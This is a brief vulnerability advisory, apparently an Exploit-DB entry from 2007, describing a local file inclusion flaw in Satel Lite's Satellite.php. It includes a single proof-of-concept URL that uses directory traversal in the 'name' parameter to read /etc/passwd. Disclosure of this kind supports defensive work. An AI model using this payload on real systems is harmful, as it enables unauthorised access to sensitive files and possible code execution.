Satel Lite - 'Satellite.php' Local File Inclusion

EDB-ID:

29782


Author:

rUnViRuS

Type:

webapps


Platform:

PHP

Date:

2007-11-26


source: https://www.securityfocus.com/bid/23143/info

Satel Lite is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to access sensitive information and to execute local script code in the context of the application; this may facilitate other attacks against the affected computer.

http://www.example.com/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index